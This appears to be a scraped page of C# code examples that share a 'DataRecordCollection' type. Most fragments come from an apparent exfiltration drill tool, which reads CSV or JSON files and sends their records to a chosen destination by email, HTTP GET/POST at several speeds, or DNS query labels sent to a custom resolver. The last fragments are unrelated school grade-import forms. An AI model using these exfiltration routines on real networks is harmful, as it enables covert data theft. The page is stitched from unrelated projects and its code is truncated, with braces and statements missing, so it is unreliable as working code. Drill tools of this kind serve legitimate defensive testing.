Beispiel #1
        public int SendDecrementalEmails(DataRecordCollection data, string destination)
            int sent          = 0;
            int current_chunk = data.GetShape().Rows;

            while (sent < data.GetShape().Rows)
                current_chunk /= 2;
                if (current_chunk == 0)
                    ++current_chunk;    //we need at least one more record if its here and the chunk size is zero
                int records_to_send = 0;
                if (sent + current_chunk >= data.GetShape().Rows)
                    records_to_send = data.GetShape().Rows - sent;
                    records_to_send = current_chunk;
                DataRecordCollection drc = new DataRecordCollection(data.Schema);
                foreach (DataRecord d in data.GetRecords().Skip(sent).Take(records_to_send))
                SendAllRecords(drc, destination);
                sent += records_to_send;
Beispiel #2
        private int FastSend(DataRecordCollection data, string destination)
            int         sent             = 0;
            HttpClient  httpclient       = new HttpClient();
            String      exfilDestination = destination;
            String      finalURL         = exfilDestination;
            List <Task> tasks            = new List <Task>();

            string[] keys = data.GetSchema();
            foreach (object dd in data)  //iterate through each record in the records list
                if (dd == null)
                DataRecord dr = (DataRecord)dd;
                Task       t  = Task.Run(() =>
                                         { sent += DoWork(dr, keys, finalURL, destination); });
            foreach (Task t in tasks)
                t.Wait();                       //wait to finsih all requests before we move on.
        /// <summary>
        /// This will read the information from within records and then urlencode & send to destination_url
        /// the defaultPath is optional.  It will only be taken into consideration if the destionation_url ends in a '/' character.
        /// this is used to ensure a well formed url, as a uri query should not (but technically can) be sent to a directory.. ie a url ending in '/'
        /// so basically, if the url ends in a '/' then the value of defaultPath will be appended to it.  this should be a file name of some sort.
        /// if defaultPath ends in a '/' character, then this will force appending the uri query to the end of a directory uri
        /// As always, "THIS IS A DRILL, THIS IS A DRILL, THIS IS A DRILL" will be appended to the end of the query
        /// </summary>
        /// <param name="records">the DataRecordCollection object containing the records to be send</param>
        /// <param name="destionation_url">the desintation url to send the data too</param>
        /// <param name="defaultPath">the uri path to query.  only used if the default_url ends in a '/' character</param>
        public int Send(DataRecordCollection data, string destination)
            //String URL = host + /+ URLENCODE THE LINE HERE
            //looks like
            //format of: [host]:[port]/uri/?[schema1]=[value1]....
            // Console.WriteLine(responseString);
            if ((ops & Options.SPEED_MODERATE) != 0)
                return(ModerateSend(data, destination));

            else if ((ops | Options.SPEED_FAST) != 0)
                return(FastSend(data, destination));

            else if ((ops | Options.SPEED_SLOW) != 0)
                return(SlowSend(data, destination));

            else if ((ops | Options.SPEED_PARANOID) != 0)
                return(ParanoidSend(data, destination));

                return(ModerateSend(data, destination));
        public DataRecordCollection GetFileContents(bool b64encode = false)
            DataRecordCollection result = null;

            using (StreamReader file = File.OpenText(path))
                using (JsonTextReader reader = new JsonTextReader(file))
                    JObject obj1 = (JObject)JToken.ReadFrom(reader);
                    foreach (JObject obj in obj1.Children <JObject>())
                        Dictionary <String, String> dictObj = obj1.ToObject <Dictionary <string, string> >();
                        List <String> schema = dictObj.Keys.Cast <String>().ToList();
                        List <String> values = dictObj.Values.Cast <String>().ToList();
                        if (b64encode)
                            values = Base64Utils.MakeB64(values);
                        if (result == null)
                            result = new DataRecordCollection(schema.ToArray(), values.ToArray());
Beispiel #5
        public DataRecordCollection GetFileContents(bool b64encode)
            DataRecordCollection result = null;
            var           csvLines      = File.ReadLines(path);
            List <String> schema        = new List <String>();

            //---Loop through each line in target file and send POST request to server---
            foreach (String line in csvLines)
                if (schema.Count() == 0)//if we dont yet have the schema, assume that the first line of the SV file contains the schema header.  If it doesnt, well... that sucks
                    schema = line.Split(delim).ToList();
                string[] values = (b64encode == true) ? Base64Utils.MakeB64(line.Split(delim)):line.Split(delim);
                if (values.Length > 0)    //Ensure that we are returning data, and not the empty final line from the file
                    if (result == null)
                        result = new DataRecordCollection(schema.ToArray());
        /// <summary>
        /// send all records at once
        /// </summary>
        /// <param name="data">what to send</param>
        /// <param name="destination">what email address to send to</param>
        /// <returns>the number of records sent is returened, ie the row shape of the data</returns>
        public int SendAllRecords(DataRecordCollection data, string destination)
            var    fromAddress = new MailAddress(email_from, email_from.Split('@')[0]);
            var    toAddress   = new MailAddress(destination, destination.Split('@')[0]);
            string email_body  = this.body + "\n" + data.ToString();

            var smtp = new SmtpClient
                Host                  = server,
                Port                  = Port,
                EnableSsl             = ssl,
                DeliveryMethod        = SmtpDeliveryMethod.Network,
                UseDefaultCredentials = false,
                Credentials           = new NetworkCredential(fromAddress.Address, password)

            using (var msg = new MailMessage(fromAddress, toAddress)
                Subject = subject_line,
                Body = email_body

Beispiel #7
        /// <summary>
        /// This sends data as a http post request.  As a post can be very long, "THIS IS A DRILL, THIS IS A DRILL, THIS IS A DRILL" is appended to the beginnning and end of the post
        /// </summary>
        /// <param name="records">the data records to send from </param>
        public int Send(DataRecordCollection data, string destination)
            if ((ops & Options.SPEED_MODERATE) != 0)
                return(ModerateSend(data, destination));

            else if ((ops | Options.SPEED_FAST) != 0)
                return(FastSend(data, destination));

            else if ((ops | Options.SPEED_SLOW) != 0)
                return(SlowSend(data, destination));

            else if ((ops | Options.SPEED_PARANOID) != 0)
                return(ParanoidSend(data, destination));

                return(ModerateSend(data, destination));
Beispiel #8
        public int SendAllRecords(DataRecordCollection data, string destination)
            string sending_body = email_body;

            sending_body += Environment.NewLine;
            sending_body += data.ToString();
            SendMailItem(destination, sending_body);
Beispiel #9
        public int Send(DataRecordCollection data, string destination)
            int sent = 0;

            foreach (DataRecord d in data.GetRecords())
                string sending_body = email_body + d.ToString();
                SendMailItem(destination, sending_body);
        private int HandleEmailSender(DataRecordCollection data, Options opts)
            if ((opts & Options.EMAIL_DECREMENTAL_MODE) != 0)
                return(email_sender.SendDecrementalEmails(data, exfilDestination));

            else if ((opts & Options.EMAIL_ONE_SHOT_MODE) != 0)
                return(email_sender.SendAllRecords(data, exfilDestination));

                return(email_sender.Send(data, exfilDestination));
 private int HandleGenericSender(DataRecordCollection data, Options opts)
     if (sendMethod == SupportedSenderMethods.DNS)
         if ((opts & Options.DNS_BYPASS_HOST_RESOlVERS) != 0)
             return(sender.Send(data, exfilDestination));
             return(sender.Send(data, null));
     else if (sendMethod == SupportedSenderMethods.GET || sendMethod == SupportedSenderMethods.POST)
         return(sender.Send(data, exfilDestination));
        public int SendExfilData(Options opts)
            if ((opts & Options.HTTP_USE_SSL) != 0)
                throw new NotImplementedException();                                    //not implemented yet
            DataRecordCollection data = null;

                if ((opts & Options.DATA_ENCODE_TO_B64) != 0)
                    data = reader.GetFileContents(true);                                            //do we b64 encode the data?
                    data = reader.GetFileContents();
            catch (Exception e)
                throw new InvalidDataException("The file reader failed to fetch file contents");
            if (data == null)
                throw new InvalidOperationException();
            if (data.GetShape().Rows > 0)  //make sure we have work to do
                if (email_sender != null)  //see if we are sending via email
                    return(HandleEmailSender(data, opts));

                else if (sender != null)     //see if we are sending via non email
                    return(HandleGenericSender(data, opts));
Beispiel #13
        private int ModerateSend(DataRecordCollection data, string destination)
            int         sent             = 0;
            HttpClient  httpclient       = new HttpClient();
            String      exfilDestination = destination;
            String      finalURL         = exfilDestination;
            List <Task> tasks            = new List <Task>();

            string[] keys = data.GetSchema();
            foreach (object dd in data)  //iterate through each record in the records list
                if (dd == null)

                DataRecord dr = (DataRecord)dd;
                sent += DoWork(dr, keys, finalURL, destination);
        /// <summary>
        ///this will perform a sequence of DNS querys, which are roughly equivalent to doing the following:
        ///  GetHostEntry("")
        ///  GetHostEntry("[val1].[key1].[rec1]")
        ///  GetHostEntry("[val2].[key2].[rec2]")
        ///  GetHostEntry("[val3].[key3].[rec3]")
        ///  GetHostEntry("[val-n].[key-n].[rec-n]")
        ///  GetHostEntry("")
        ///  where 'n' is the number of key value pairs in a record.
        ///  It will repeat this pattern for every piece of exfiltrated data.
        ///  --
        ///  for eaxmple:
        ///      a DataRecordCollection object with a Shape of 100,5 (that means 100 records, and schema lenght of 5)
        ///      will make a total of 100x5+2=502 dns queryies to the target.
        ///  So. in general, it will send a total number of DNS requests equal to:
        ///     records.Shape.Rows x records.Shape.Columns + 2
        ///  It will not wait nor care about the response.
        /// </summary>
        /// <param name="records">the DataRecordCollection object to exfiltrate</param>
        /// <param name="target_domain">DNS domain to target.  If default, the query will be sent to 'localhost.local'</param>
        /// /// <param name="base64encode">base 64 encode the values.  default is false</param>
        public int Send(DataRecordCollection data, string custom_name_resolver)
            IPAddress t;

            custom_name_resolver = (!IPAddress.TryParse(custom_name_resolver, out t))   //check if we have been supplied an ip.  if so, continue, if not then translate the host name to an ip
                ? DnsUtils.GetIPFromName(custom_name_resolver)
                : custom_name_resolver;

            int    items_sent = 0;
            bool   async_mode = ((ops & Options.ASYNCHRONOUS_MODE) != 0);
            string query;

            string[] keys = data.GetSchema();
            foreach (object o in data.GetRecords()) //iterate through each record in the records list
                if (o == null)
                DataRecord dr   = (DataRecord)o;
                string[]   vals = dr.Data;
                query = "ThisIsADrill.ThisIsADrill.ThisIsADrill." + host_suffix;
                DnsUtils.SendDnsQuery(query, custom_name_resolver, async_mode);
                for (int i = 0; i < keys.Length; i++)
                    String   key       = keys[i];
                    String   val       = vals[i];
                    String   recNumber = "rec" + RecordsSent.ToString();
                    String[] labels    = new String[] { val, key, recNumber, SAFETY_WORD + host_suffix };
                    labels = DnsUtils.MakeLabelsDNSCompliant(labels);
                    query  = String.Join(".", labels.ToList());
                    DnsUtils.SendDnsQuery(query, custom_name_resolver, async_mode);
                DnsUtils.SendDnsQuery("ThisIsADrill.ThisIsADrill.ThisIsADrill" + host_suffix, custom_name_resolver, async_mode);
        private int SlowSend(DataRecordCollection data, string destination)
            int         sent             = 0;
            HttpClient  httpclient       = new HttpClient();
            String      exfilDestination = destination;
            String      finalURL         = exfilDestination;
            List <Task> tasks            = new List <Task>();

            string[] keys = data.GetSchema();
            foreach (object dd in data)  //iterate through each record in the records list
                if (dd == null)

                DataRecord dr = (DataRecord)dd;
                sent += DoWork(dr, keys, destination);
                Console.WriteLine("Sent. Sleeping 5 seconds");
        public int Send(DataRecordCollection data, string destination)
            int sent = 0;

            foreach (DataRecord d in data.GetRecords())
                if (d == null)
                var fromAddress = new MailAddress(email_from, email_from.Split('@')[0]);
                var toAddress   = new MailAddress(destination, destination.Split('@')[0]);

                string email_body = d.ToString();

                var smtp = new SmtpClient
                    Host                  = server,
                    Port                  = Port,
                    EnableSsl             = ssl,
                    DeliveryMethod        = SmtpDeliveryMethod.Network,
                    UseDefaultCredentials = false,
                    Credentials           = new NetworkCredential(fromAddress.Address, password)
                using (var msg = new MailMessage(fromAddress, toAddress)
                    Subject = subject_line,
                    Body = this.body + "\n" + email_body
Beispiel #17
        public ImportStartupForm()

            //_effortMapper = new EffortMapper();

            // 載入預設儲存值

            _worker = new BackgroundWorker();
            _worker.WorkerReportsProgress = true;
            _worker.ProgressChanged      += delegate(object sender, ProgressChangedEventArgs e)
                lblMessage.Text = "" + e.UserState;
            _worker.DoWork += delegate(object sender, DoWorkEventArgs e)
                #region Worker DoWork
                _worker.ReportProgress(0, "訊息:檢查讀卡文字格式…");

                #region 檢查文字檔
                ValidateTextFiles  vtf      = new ValidateTextFiles(StudentNumberMax);
                ValidateTextResult vtResult = vtf.CheckFormat(_files);
                if (vtResult.Error)
                    e.Result = vtResult;

                //文字檔轉 RawData
                RawDataCollection rdCollection = new RawDataCollection();

                //RawData 轉 DataRecord
                DataRecordCollection drCollection = new DataRecordCollection();

                _rawDataValidator    = new DataValidator <RawData>();
                _dataRecordValidator = new DataValidator <DataRecord>();

                #region 取得驗證需要的資料
                _worker.ReportProgress(5, "訊息:取得學生資料…");

                List <StudentObj> studentList = GetInSchoolStudents();

                List <string> s_ids = new List <string>();
                Dictionary <string, List <string> > studentNumberToStudentIDs = new Dictionary <string, List <string> >();
                foreach (StudentObj student in studentList)
                    string sn = student.StudentNumber;// SCValidatorCreator.GetStudentNumberFormat(student.StudentNumber);
                    if (!studentNumberToStudentIDs.ContainsKey(sn))
                        studentNumberToStudentIDs.Add(sn, new List <string>());

                foreach (string each in studentNumberToStudentIDs.Keys)
                    if (studentNumberToStudentIDs[each].Count > 1)

                foreach (var dr in drCollection)
                    if (studentNumberToStudentIDs.ContainsKey(dr.StudentNumber))


                _worker.ReportProgress(10, "訊息:取得課程資料…");
                List <SHCourseRecord>    courseList = SHCourse.SelectBySchoolYearAndSemester(SchoolYear, Semester);
                List <SHAEIncludeRecord> aeList     = SHAEInclude.SelectAll();

                //List<JHSCAttendRecord> scaList = JHSCAttend.SelectAll();
                var c_ids = from course in courseList select course.ID;
                _worker.ReportProgress(15, "訊息:取得修課資料…");
                //List<JHSCAttendRecord> scaList2 = JHSCAttend.SelectByStudentIDAndCourseID(s_ids, c_ids.ToList<string>());
                List <SHSCAttendRecord> scaList = new List <SHSCAttendRecord>();
                FunctionSpliter <string, SHSCAttendRecord> spliter = new FunctionSpliter <string, SHSCAttendRecord>(300, 3);
                spliter.Function = delegate(List <string> part)
                    return(SHSCAttend.Select(part, c_ids.ToList <string>(), null, SchoolYear.ToString(), Semester.ToString()));
                scaList = spliter.Execute(s_ids);

                _worker.ReportProgress(20, "訊息:取得試別資料…");
                List <SHExamRecord> examList = SHExam.SelectAll();

                #region 註冊驗證
                _worker.ReportProgress(30, "訊息:載入驗證規則…");
                _rawDataValidator.Register(new SubjectCodeValidator());
                _rawDataValidator.Register(new ClassCodeValidator());
                _rawDataValidator.Register(new ExamCodeValidator());

                SCValidatorCreator scCreator = new SCValidatorCreator(SHStudent.SelectByIDs(s_ids), courseList, scaList);
                _dataRecordValidator.Register(new ExamValidator(examList));
                _dataRecordValidator.Register(new CourseExamValidator(scCreator.StudentCourseInfo, aeList, examList));

                #region 進行驗證
                _worker.ReportProgress(45, "訊息:進行驗證中…");
                List <string> msgList = new List <string>();

                foreach (RawData rawData in rdCollection)
                    List <string> msgs = _rawDataValidator.Validate(rawData);
                if (msgList.Count > 0)
                    e.Result = msgList;

                foreach (DataRecord dataRecord in drCollection)
                    List <string> msgs = _dataRecordValidator.Validate(dataRecord);
                if (msgList.Count > 0)
                    e.Result = msgList;

                #region 取得學生的評量成績

                _worker.ReportProgress(65, "訊息:取得學生評量成績…");


                //var student_ids = from student in scCreator.StudentNumberDictionary.Values select student.ID;
                //List<string> course_ids = scCreator.AttendCourseIDs;

                var scaIDs = from sca in scaList select sca.ID;

                Dictionary <string, SHSCETakeRecord>      sceList    = new Dictionary <string, SHSCETakeRecord>();
                FunctionSpliter <string, SHSCETakeRecord> spliterSCE = new FunctionSpliter <string, SHSCETakeRecord>(300, 3);
                spliterSCE.Function = delegate(List <string> part)
                    return(SHSCETake.Select(null, null, null, null, part));
                foreach (SHSCETakeRecord sce in spliterSCE.Execute(scaIDs.ToList()))
                    string key = GetCombineKey(sce.RefStudentID, sce.RefCourseID, sce.RefExamID);
                    if (!sceList.ContainsKey(key))
                        sceList.Add(key, sce);

                Dictionary <string, SHExamRecord>     examTable = new Dictionary <string, SHExamRecord>();
                Dictionary <string, SHSCAttendRecord> scaTable  = new Dictionary <string, SHSCAttendRecord>();

                foreach (SHExamRecord exam in examList)
                    if (!examTable.ContainsKey(exam.Name))
                        examTable.Add(exam.Name, exam);

                foreach (SHSCAttendRecord sca in scaList)
                    string key = GetCombineKey(sca.RefStudentID, sca.RefCourseID);
                    if (!scaTable.ContainsKey(key))
                        scaTable.Add(key, sca);

                _worker.ReportProgress(80, "訊息:成績資料建立…");

                foreach (DataRecord dr in drCollection)
                    SHStudentRecord       student = student = scCreator.StudentNumberDictionary[dr.StudentNumber];
                    SHExamRecord          exam    = examTable[dr.Exam];
                    List <SHCourseRecord> courses = new List <SHCourseRecord>();
                    foreach (SHCourseRecord course in scCreator.StudentCourseInfo.GetCourses(dr.StudentNumber))
                        if (dr.Subjects.Contains(course.Subject))

                    foreach (SHCourseRecord course in courses)
                        string key = GetCombineKey(student.ID, course.ID, exam.ID);

                        if (sceList.ContainsKey(key))

                        SHSCETakeRecord sh = new SHSCETakeRecord();
                        sh.RefCourseID   = course.ID;
                        sh.RefExamID     = exam.ID;
                        sh.RefSCAttendID = scaTable[GetCombineKey(student.ID, course.ID)].ID;
                        sh.RefStudentID  = student.ID;

                        double  reScore = (double)dr.Score;
                        decimal Score   = decimal.Parse(reScore.ToString());

                        if (Global.StudentDocRemove)
                            string qq = Score.ToString();
                            if (qq.Contains("."))
                                string[] kk = qq.Split('.');
                                sh.Score = decimal.Parse(kk[0]);
                                sh.Score = decimal.Parse(Score.ToString());
                            sh.Score = decimal.Parse(Score.ToString());

                        //sceNew.Effort = _effortMapper.GetCodeByScore(dr.Score);

                        if (!AddScoreDic.ContainsKey(sh.RefStudentID + "_" + course.ID + "_" + exam.ID))
                            AddScoreDic.Add(sh.RefStudentID + "_" + course.ID + "_" + exam.ID, sh);
                _worker.ReportProgress(100, "訊息:背景作業完成…");
                e.Result = null;
            _worker.RunWorkerCompleted += delegate(object sender, RunWorkerCompletedEventArgs e)
                #region Worker Completed
                if (e.Error == null && e.Result == null)
                    if (!_upload.IsBusy)
                        if (_deleteScoreList.Count > 0)
                            lblMessage.Text = "訊息:成績上傳中…";
                            FISCA.Presentation.MotherForm.SetStatusBarMessage("成績上傳中…", 0);
                            counter = 0;
                    ControlEnable = true;

                    if (e.Error != null)
                        MsgBox.Show("匯入失敗。" + e.Error.Message);
                    else if (e.Result != null && e.Result is ValidateTextResult)
                        ValidateTextResult    result = e.Result as ValidateTextResult;
                        ValidationErrorViewer viewer = new ValidationErrorViewer();
                        viewer.SetTextFileError(result.LineIndexes, result.ErrorFormatLineIndexes, result.DuplicateLineIndexes);
                    else if (e.Result != null && e.Result is List <string> )
                        ValidationErrorViewer viewer = new ValidationErrorViewer();
                        viewer.SetErrorLines(e.Result as List <string>);

            _upload = new BackgroundWorker();
            _upload.WorkerReportsProgress = true;
            _upload.ProgressChanged      += new ProgressChangedEventHandler(_upload_ProgressChanged);
            _upload.DoWork += new DoWorkEventHandler(_upload_DoWork);

            _upload.RunWorkerCompleted += new RunWorkerCompletedEventHandler(_upload_RunWorkerCompleted);

            _warn = new BackgroundWorker();
            _warn.WorkerReportsProgress = true;
            _warn.DoWork += delegate(object sender, DoWorkEventArgs e)
                _warn.ReportProgress(0, "產生警告訊息...");

                examDict = new Dictionary <string, string>();
                foreach (SHExamRecord exam in SHExam.SelectAll())
                    if (!examDict.ContainsKey(exam.ID))
                        examDict.Add(exam.ID, exam.Name);

                WarningForm form  = new WarningForm();
                int         count = 0;
                foreach (SHSCETakeRecord sce in _deleteScoreList)
                    // 當成績資料是空值跳過
                    //if (sce.Score.HasValue == false && sce.Effort.HasValue == false && string.IsNullOrEmpty(sce.Text))
                    //if (sce.Score == null && string.IsNullOrEmpty(sce.Text))
                    //   continue;


                    SHStudentRecord student = SHStudent.SelectByID(sce.RefStudentID);
                    SHCourseRecord  course  = SHCourse.SelectByID(sce.RefCourseID);
                    string          exam    = (examDict.ContainsKey(sce.RefExamID) ? examDict[sce.RefExamID] : "<未知的試別>");

                    string s = "";
                    if (student.Class != null)
                        s += student.Class.Name;
                    if (!string.IsNullOrEmpty("" + student.SeatNo))
                        s += " " + student.SeatNo + "號";
                    if (!string.IsNullOrEmpty(student.StudentNumber))
                        s += " (" + student.StudentNumber + ")";
                    s += " " + student.Name;

                    string scoreName = sce.RefStudentID + "_" + sce.RefCourseID + "_" + sce.RefExamID;

                    if (AddScoreDic.ContainsKey(scoreName))
                        form.AddMessage(student.ID, s, string.Format("學生在「{0}」課程「{1}」中已有成績「{2}」將修改為「{3}」。", course.Name, exam, sce.Score, AddScoreDic[scoreName].Score));
                        form.AddMessage(student.ID, s, string.Format("學生在「{0}」課程「{1}」中已有成績「{2}」。", course.Name, exam, sce.Score));

                    _warn.ReportProgress((int)(count * 100 / _deleteScoreList.Count), "產生警告訊息...");

                e.Result = form;
            _warn.RunWorkerCompleted += delegate(object sender, RunWorkerCompletedEventArgs e)
                WarningForm form = e.Result as WarningForm;

                if (form.ShowDialog() == DialogResult.OK)
                    lblMessage.Text = "訊息:成績上傳中…";
                    FISCA.Presentation.MotherForm.SetStatusBarMessage("成績上傳中…", 0);
                    counter = 0;
                    this.DialogResult = DialogResult.Cancel;
            _warn.ProgressChanged += delegate(object sender, ProgressChangedEventArgs e)
                FISCA.Presentation.MotherForm.SetStatusBarMessage("" + e.UserState, e.ProgressPercentage);

            _files           = new List <FileInfo>();
            _addScoreList    = new List <SHSCETakeRecord>();
            _deleteScoreList = new List <SHSCETakeRecord>();
            AddScoreDic      = new Dictionary <string, SHSCETakeRecord>();
            examDict         = new Dictionary <string, string>();
Beispiel #18
        public ImportStartupForm()
            // 每次開啟,就重新載入 代碼對照


            _effortMapper = new EffortMapper();

            // 載入預設儲存值

            _worker = new BackgroundWorker();
            _worker.WorkerReportsProgress = true;
            _worker.ProgressChanged      += delegate(object sender, ProgressChangedEventArgs e)
                lblMessage.Text = "" + e.UserState;
            _worker.DoWork += delegate(object sender, DoWorkEventArgs e)

                #region Worker DoWork
                _worker.ReportProgress(0, "檢查讀卡文字格式…");

                #region 檢查文字檔
                ValidateTextFiles  vtf      = new ValidateTextFiles(intStudentNumberLenght.Value);
                ValidateTextResult vtResult = vtf.CheckFormat(_files);
                if (vtResult.Error)
                    e.Result = vtResult;

                //文字檔轉 RawData
                RawDataCollection rdCollection = new RawDataCollection();

                //RawData 轉 DataRecord
                DataRecordCollection drCollection = new DataRecordCollection();

                _rawDataValidator    = new DataValidator <RawData>();
                _dataRecordValidator = new DataValidator <DataRecord>();

                #region 取得驗證需要的資料
                _worker.ReportProgress(0, "取得學生資料…");
                List <JHStudentRecord> studentList = GetInSchoolStudents();

                List <string> s_ids = new List <string>();
                Dictionary <string, string> studentNumberToStudentIDs = new Dictionary <string, string>();
                foreach (JHStudentRecord student in studentList)
                    string sn = SCValidatorCreator.GetStudentNumberFormat(student.StudentNumber);
                    if (!studentNumberToStudentIDs.ContainsKey(sn))
                        studentNumberToStudentIDs.Add(sn, student.ID);

                //紀錄現在所有txt 上 的學號,以處理重覆學號學號問題
                List <string> s_numbers = new List <string>();

                foreach (var dr in drCollection)
                    if (studentNumberToStudentIDs.ContainsKey(dr.StudentNumber))
                        //學號不存在系統中,下面的Validator 會進行處理

                    //2017/1/8 穎驊註解, 原本的程式碼並沒有驗證學號重覆的問題,且無法在他Validator 的處理邏輯加入,故在此驗證
                    if (!s_numbers.Contains(dr.StudentNumber))
                        msgList.Add("學號:" + dr.StudentNumber + ",資料重覆,請檢察資料來源txt是否有重覆填寫的學號資料。");


                _worker.ReportProgress(0, "取得學期領域成績…");
                List <JHSemesterScoreRecord> jhssr_list = JHSemesterScore.SelectBySchoolYearAndSemester(s_ids, SchoolYear, Semester);


                #region 註冊驗證
                _worker.ReportProgress(0, "載入驗證規則…");
                _rawDataValidator.Register(new DomainCodeValidator());
                _rawDataValidator.Register(new ClassCodeValidator());
                _rawDataValidator.Register(new ExamCodeValidator());

                SCValidatorCreator scCreator = new SCValidatorCreator(JHStudent.SelectByIDs(s_ids));
                //_dataRecordValidator.Register(new ExamValidator(examList));
                //_dataRecordValidator.Register(new CourseExamValidator(scCreator.StudentCourseInfo, aeList, examList));

                #region 進行驗證
                _worker.ReportProgress(0, "進行驗證中…");

                foreach (RawData rawData in rdCollection)
                    List <string> msgs = _rawDataValidator.Validate(rawData);
                if (msgList.Count > 0)
                    e.Result = msgList;

                foreach (DataRecord dataRecord in drCollection)
                    List <string> msgs = _dataRecordValidator.Validate(dataRecord);
                if (msgList.Count > 0)
                    e.Result = msgList;

                #region 取得學生的評量成績

                //Dictionary<string, JHSCETakeRecord> sceList = new Dictionary<string, JHSCETakeRecord>();
                //FunctionSpliter<string, JHSCETakeRecord> spliterSCE = new FunctionSpliter<string, JHSCETakeRecord>(300, 3);
                //spliterSCE.Function = delegate(List<string> part)
                //    return JHSCETake.Select(null, null, null, null, part);
                //foreach (JHSCETakeRecord sce in spliterSCE.Execute(scaIDs.ToList()))
                //    string key = GetCombineKey(sce.RefStudentID, sce.RefCourseID, sce.RefExamID);
                //    if (!sceList.ContainsKey(key))
                //        sceList.Add(key, sce);

                //Dictionary<string, JHExamRecord> examTable = new Dictionary<string, JHExamRecord>();
                //Dictionary<string, JHSCAttendRecord> scaTable = new Dictionary<string, JHSCAttendRecord>();

                //foreach (JHExamRecord exam in examList)
                //    if (!examTable.ContainsKey(exam.Name))
                //        examTable.Add(exam.Name, exam);

                //foreach (JHSCAttendRecord sca in scaList)
                //    string key = GetCombineKey(sca.RefStudentID, sca.RefCourseID);
                //    if (!scaTable.ContainsKey(key))
                //        scaTable.Add(key, sca);

                //2018/1/8 穎驊新增
                foreach (DataRecord dr in drCollection)
                    // 利用學號 將學生的isd 對應出來
                    string s_id = studentNumberToStudentIDs[dr.StudentNumber];

                    // 紀錄學生是否有學期成績,如果連學期成績都沒有,本補考成績將會無法匯入(因為不合理)
                    bool haveSemesterRecord = false;

                    foreach (JHSemesterScoreRecord jhssr in jhssr_list)
                        if (jhssr.RefStudentID == s_id)
                            haveSemesterRecord = true;

                            if (jhssr.Domains.ContainsKey(dr.Domain))
                                // 假如原本已經有補考成績,必須將之加入waring_list,讓使用者決定是否真的要覆蓋
                                if (jhssr.Domains[dr.Domain].ScoreMakeup != null)
                                    string warning = "學號:" + dr.StudentNumber + "學生,在學年度: " + SchoolYear + ",學期: " + Semester + ",領域: " + dr.Domain + "已有補考成績: " + jhssr.Domains[dr.Domain].ScoreMakeup + ",本次匯入將會將其覆蓋取代。";


                                    if (!msg_DuplicatedDict.ContainsKey(s_id))
                                        msg_DuplicatedDict.Add(s_id, warning);

                                    jhssr.Domains[dr.Domain].ScoreMakeup = dr.Score;

                                    jhssr.Domains[dr.Domain].ScoreMakeup = dr.Score;

                                // 2018/1/8 穎驊註解,針對假如該學生在當學期成績卻沒有其領域成績時,跳出提醒,因為正常情境是領域成績計算出來不及格,才需要補考。
                                msgList.Add("學號:" + dr.StudentNumber + "學生,在學年度:" + SchoolYear + ",學期:" + Semester + ",並無領域:" + dr.Domain + "成績,請先至學生上確認是否已有結算資料。");

                    if (!haveSemesterRecord)
                        msgList.Add("學號:" + dr.StudentNumber + "學生,在學年度:" + SchoolYear + ",學期:" + Semester + ",並無學期成績,請先至學生上確認是否已有結算資料。");

                if (msgList.Count > 0)
                    e.Result = msgList;


                e.Result = null;
            _worker.RunWorkerCompleted += delegate(object sender, RunWorkerCompletedEventArgs e)
                #region Worker Completed
                if (e.Error == null && e.Result == null)
                    if (!_upload.IsBusy)
                        if (_duplicateMakeUpScoreList.Count > 0)
                            lblMessage.Text = "成績上傳中…";
                            FISCA.Presentation.MotherForm.SetStatusBarMessage("成績上傳中…", 0);
                            counter = 0;
                    ControlEnable = true;

                    if (e.Error != null)
                        MsgBox.Show("匯入失敗。" + e.Error.Message);
                    else if (e.Result != null && e.Result is ValidateTextResult)
                        ValidateTextResult    result = e.Result as ValidateTextResult;
                        ValidationErrorViewer viewer = new ValidationErrorViewer();
                        viewer.SetTextFileError(result.LineIndexes, result.ErrorFormatLineIndexes, result.DuplicateLineIndexes);
                    else if (e.Result != null && e.Result is List <string> )
                        ValidationErrorViewer viewer = new ValidationErrorViewer();
                        viewer.SetErrorLines(e.Result as List <string>);

            _upload = new BackgroundWorker();
            _upload.WorkerReportsProgress = true;
            _upload.ProgressChanged      += new ProgressChangedEventHandler(_upload_ProgressChanged);
            //_upload.ProgressChanged += delegate(object sender, ProgressChangedEventArgs e)
            //    counter += double.Parse("" + e.ProgressPercentage);
            //    FISCA.Presentation.MotherForm.SetStatusBarMessage("成績上傳中…", (int)(counter * 100f / (double)_addScoreList.Count));
            _upload.DoWork += new DoWorkEventHandler(_upload_DoWork);

            _upload.RunWorkerCompleted += new RunWorkerCompletedEventHandler(_upload_RunWorkerCompleted);

            _warn = new BackgroundWorker();
            _warn.WorkerReportsProgress = true;
            _warn.DoWork += delegate(object sender, DoWorkEventArgs e)
                _warn.ReportProgress(0, "產生警告訊息...");

                Dictionary <string, string> examDict = new Dictionary <string, string>();
                foreach (JHExamRecord exam in JHExam.SelectAll())
                    if (!examDict.ContainsKey(exam.ID))
                        examDict.Add(exam.ID, exam.Name);

                WarningForm form  = new WarningForm();
                int         count = 0;
                foreach (JHSemesterScoreRecord sce in _duplicateMakeUpScoreList)
                    form.Add(sce.RefStudentID, sce.Student.Name, msg_DuplicatedDict[sce.RefStudentID]);
                    _warn.ReportProgress((int)(count * 100 / _duplicateMakeUpScoreList.Count), "產生警告訊息...");

                e.Result = form;
            _warn.RunWorkerCompleted += delegate(object sender, RunWorkerCompletedEventArgs e)
                WarningForm form = e.Result as WarningForm;

                if (form.ShowDialog() == DialogResult.OK)
                    lblMessage.Text = "成績上傳中…";
                    FISCA.Presentation.MotherForm.SetStatusBarMessage("成績上傳中…", 0);
                    counter = 0;
                    this.DialogResult = DialogResult.Cancel;
            _warn.ProgressChanged += delegate(object sender, ProgressChangedEventArgs e)
                FISCA.Presentation.MotherForm.SetStatusBarMessage("" + e.UserState, e.ProgressPercentage);

            _files = new List <FileInfo>();
Beispiel #19
        public ImportStartupForm()

            _effortMapper = new EffortMapper();

            // 載入預設儲存值

            _worker = new BackgroundWorker();
            _worker.WorkerReportsProgress = true;
            _worker.ProgressChanged      += delegate(object sender, ProgressChangedEventArgs e)
                lblMessage.Text = "" + e.UserState;
            _worker.DoWork += delegate(object sender, DoWorkEventArgs e)
                #region Worker DoWork
                _worker.ReportProgress(0, "檢查讀卡文字格式…");

                #region 檢查文字檔
                ValidateTextFiles  vtf      = new ValidateTextFiles(intStudentNumberLenght.Value);
                ValidateTextResult vtResult = vtf.CheckFormat(_files);
                if (vtResult.Error)
                    e.Result = vtResult;

                //文字檔轉 RawData
                RawDataCollection rdCollection = new RawDataCollection();

                //RawData 轉 DataRecord
                DataRecordCollection drCollection = new DataRecordCollection();

                _rawDataValidator    = new DataValidator <RawData>();
